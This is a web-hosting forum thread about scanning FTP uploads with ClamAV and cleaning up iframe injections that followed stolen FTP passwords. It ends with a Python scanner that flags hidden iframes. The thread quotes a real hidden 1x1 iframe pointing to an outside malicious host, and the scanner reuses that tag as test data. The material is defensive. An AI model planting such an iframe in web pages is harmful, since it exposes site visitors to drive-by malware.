Thanks for spiral's post, now I'm working on it.
proftpd includes external clamav support for uploads.
Michael Shinn
seems that pureftp can also scan
but I'm unable to get the config here to work
Integrate pure-ftpd with clamav - CPanelDirect
would be a great addition
everything looks right - I've triple checked the steps BUT the sample file is NOT removed
clamav is capable of scanning files, period. That means everything that is a file. Actually it can scan more than just files, it can scan streams of data for virus identities.
So can you make it scan files uploaded by XYZ method, sure you can.
I do know that pure-ftpd allows you to set an antivirus to scan uploaded files.
cPanel allows users to scan their entire home directory with clamav!!!
If you want, you can probably make ssh do the same with some coding changes.
Hello everyone,
Is there a modsec rule that should help prevent this iframe hack? I have some sites being infected with this iframe hack and although my servers have mod security installed in them, I am wondering if there are some modsec rules that can filter this out.
I didn't try this clamAV combination with FTP to scan uploaded files but I was told that this might cause problems for the users. I was told that there might be a delay in uploading files, so an upload can take some time depending on how heavy the file is.
Can someone who is using this combination confirm this, and what can we expect?
The latest solution for Cpanel/PureFTP servers:
SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...- cPanel Forums
would be nice to have something like this come from cpanel integrated in WHM (considering this thread is now 2 years old and 600+ posts long)
One of my clients was attacked with an iframe today:
<iframe src="http://murianin.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
Code was at the bottom of almost every .htm file in his account. Not just index named files but all others too.
I actually wrote a process that scans the entire server for I-Frame attacks both old and the newer more sophisticated encrypted rewrite hacks, notifies the administrators by email, suspends and locks accounts that have been compromised, deep scans all files on detected compromised accounts, integrates with CSF and blocks the original attacker and notifies the account owner they need to scan their home computers ASAP for the trojan that stole their password in the first place.
It also monitors FTP activity checking uploaded files and looking for suspicious patterns such as mass uploads of "index.*" files at once, changes in typical IP netblocks -- especially those from China, etc.
About 100 or so of my web hosting / data center clients have been upgraded with these new scanner processes with good results and a lot more hacks have been detected and blocked than would have been otherwise.
The main scanner is now part of my Security Toolkit; However, I've also developed a lighter standalone version for those who think they may be having I-Frame attack issues or need better tracking of that.
--Spiral
PS: I'm currently working on WHM integration for the above
Last edited by Spiral; 11-19-2009 at 09:45 PM.
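The hidden-iframe injection quoted above (1x1 pixels, `visibility:hidden`, appended at the bottom of every .htm file) is the shape a docroot scanner like the one Spiral describes has to pick out from legitimate embeds. The following is an added example written for this thread, not Spiral's toolkit or any cPanel code: it flags only iframes that are sized to 1px or styled invisible, and the sample page (including the murianin.com tag quoted in the thread) is constructed here.

```python
import re
from pathlib import Path

# Attributes that make an iframe invisible to the visitor: the pattern of the
# injected tag quoted in this thread (width/height 1, visibility:hidden).
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I | re.S)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.S)


def _attrs(raw: str) -> dict:
    """Parse one tag's attribute string into a lowercase-keyed dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR.finditer(raw)}


def _tiny(value) -> bool:
    """True when a width/height attribute is 1 pixel or less ("0", "1", "1px")."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1


def find_hidden_iframes(html: str) -> list:
    """Return the src of every iframe that is 1px-sized or styled invisible.

    A normal visible embed (e.g. a 560x315 player) is not reported.
    """
    hits = []
    for tag in IFRAME_TAG.finditer(html):
        a = _attrs(tag.group(1))
        hidden = (_tiny(a.get("width")) and _tiny(a.get("height"))) \
            or bool(HIDDEN_STYLE.search(a.get("style", "")))
        if hidden:
            hits.append(a.get("src", ""))
    return hits


def scan_tree(root, suffixes=(".htm", ".html", ".php")) -> dict:
    """Walk a docroot; map each file path to the hidden iframe srcs it contains."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            srcs = find_hidden_iframes(path.read_text(errors="replace"))
            if srcs:
                findings[str(path)] = srcs
    return findings


# Constructed sample: a legitimate page with a visible embed, followed by the
# injected tag quoted in this thread appended after </html>.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<iframe src="https://example.com/player" width="560" height="315"></iframe>
</body></html>
<iframe src="http://murianin.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>"""

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE_HTML))  # ['http://murianin.com/in.php']
```

Run `scan_tree("/home/<account>/public_html")` against a suspect account to list every file carrying such a tag; pair the output with a reset of that account's FTP password, since the thread's point is that the injection follows a stolen credential.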